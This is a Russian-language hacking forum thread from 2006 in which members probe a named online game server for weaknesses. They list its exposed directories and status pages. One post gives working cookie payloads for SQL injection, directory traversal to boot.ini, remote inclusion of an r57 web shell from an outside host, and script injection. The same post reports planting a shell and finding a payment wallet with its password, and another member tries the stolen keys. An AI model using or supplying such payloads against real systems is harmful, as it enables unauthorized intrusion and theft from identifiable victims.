Уязвимость на сайте

Discussion in 'Уязвимости' started by Ponchik, 9 Apr 2006.

Thread Status:
Not open for further replies.
  1. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Всем привет! Вот сайт
    http://85.115.112.18/
    XSpider говорит что там есть SQL Inject! Вот только я его невижу! Ещё там есть http://85.115.112.18/server-status
    P.S. Не верьте моей репутации! Я на самом деле знаю SQL Injection, PHP Injection читаю статейки по XSS а разные юзвери которые незнают что такое брут ходят с неплохими репутациями! Где справедливость?! :confused:
     
    1 person likes this.
  2. EST a1ien

    EST a1ien Elder - Старейшина

    Joined:
    2 Apr 2006
    Messages:
    249
    Likes Received:
    48
    Reputations:
    16
    Это йгровой сервер игры MuOnline я эго пытался ломануть ничего не вышло вобщем забил на него
     
  3. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    __tp://85.115.112.18/main_inc/lang.php

    __tp://85.115.112.18/server-info
     
  4. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    2 people like this.
  5. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    EST a1ien, тоже MuOnline увлекаешься =) Я просто MuOnline люблю исследовать, потомучто не умею запросами выбивать названия таблиц, а так всё зарание знаю =)

    Зкажите почему XSpider выдаёт SQL Inject Я лично его там невижу!

    Хмм... Интересно... Если вписать %27 то он его не фильтрует, но и нет ошибки =(
    А если так, фильтрует http://mu.partylife.lv/index.php?pg=lang&lg=ru'

    И раз уж все дружно ищем кривой php =) То вот
    http://mu.partylife.lv/index.php?pg=lang&lg=ru
    И естествено
    http://mu.partylife.lv/index.php?pg=lang&lg=en

    Ещё кое-что... Не уязвимость, но понятно сколько их там =) Защёл в любую папку! http://mu.partylife.lv/user_images/ Посмотрел HTML
    <META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://mu.partylife.lv/">
    По моему не хватает пару " Ну кто так делает... Что за админ там...

    У меня ещё вопрос... Можно-ли как-то подконнектиться к ихней MySQL... Судя по сайту у них там скорей всего root без пароля, серверный адресс мы знаем =) Можно попытаться, но только если есть такое чудо, как "Подключение к чужой MySQL" ;)

    <offtopic>
    Нда... Может я заслужил свою репутацию -4! Даже тему немогу создать там где надо! Перенесите плиз
    Форум АНТИЧАТ > ОФФТОП > Болталка > Развлечения > On-line игры и другие. Уязвимости. Коды.
    </offtopic>

    Вот ещё немного папок!
    http://mu.partylife.lv/downloads/
    http://mu.partylife.lv/index/
    http://mu.partylife.lv/login/
    http://mu.partylife.lv/logout/
    http://mu.partylife.lv/server-status/ - Интересно...
    http://mu.partylife.lv/server-info/ - Оч интересно...
    http://mu.partylife.lv/src/
    http://mu.partylife.lv/stats/
    http://mu.partylife.lv/video/
    http://mu.partylife.lv/includes/
    http://mu.partylife.lv/img/
    http://mu.partylife.lv/menu/
    http://mu.partylife.lv/img/misc/

    Многие из них бесполезны! Но меня оч заинтересовало /server-info/
     
    #5 Ponchik, 10 Apr 2006
    Last edited: 10 Apr 2006
    1 person likes this.
  6. EST a1ien

    EST a1ien Elder - Старейшина

    Joined:
    2 Apr 2006
    Messages:
    249
    Likes Received:
    48
    Reputations:
    16
    Вопервых там стоит винда во вторых MSSQL
    а в третьих _http://mu.partylife.lv/index.php?pg=lang&lg=ru здесь нету как я понял запроса к базе а просто идет через case
     
  7. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389
    О, кстати, я тут собираюсь исходники MuOnline на баги тестить Version=0.97.04 У кого есть какие-либо наработки по этой версии?
     
  8. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    1ten0.0net1, у меня есть 97 сервак с Castle Siege, Chaos Castle тама все порты переделаны, на нём не идёт Hack Speed, MuPie и много другой читерской фигни! Вот такой вот 97... Жестоко его переделали!
     
  9. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389
    2 Ponchik Я этой дрянбю интересуюсь исключительно в технических целях, а не игровых.
     
  10. Go0o$E

    Go0o$E Members of Antichat

    Joined:
    27 Jan 2006
    Messages:
    304
    Likes Received:
    228
    Reputations:
    419
    А вот есть там SQL injection! И еще Directory traversal, File inclusion и Cross Site Scripting. И все это в cookies, в параметре lang и в char. char=' ; lang=../../../../../../../../boot.ini ; lang=http://site.ru/r57.php ; lang=><script>alert(/ok/)</script>. Тут - http://85.115.112.18/inc.php r57shell =)

    На диске d:\lol валяется webmoney с паролем. Мой кошелек - Z305549227839 если что8).

    Shell удалил, так как уже один есть.
     
    #10 Go0o$E, 11 Apr 2006
    Last edited: 11 Apr 2006
    2 people like this.
  11. virgoz

    virgoz Elder - Старейшина

    Joined:
    16 Sep 2004
    Messages:
    151
    Likes Received:
    28
    Reputations:
    15
    Go0o$E, респект за инклуд ;) Только ключики для wm не подходят, сильно маленькие... Сейчас еще чего гляну интересного :))
     
    1 person likes this.
  12. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Хмм... Не думал что через cookies можно что-то натворить... Буду знать =)
     
  13. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    Цель достигнута, закрываю.
     
    1 person likes this.
Thread Status:
Not open for further replies.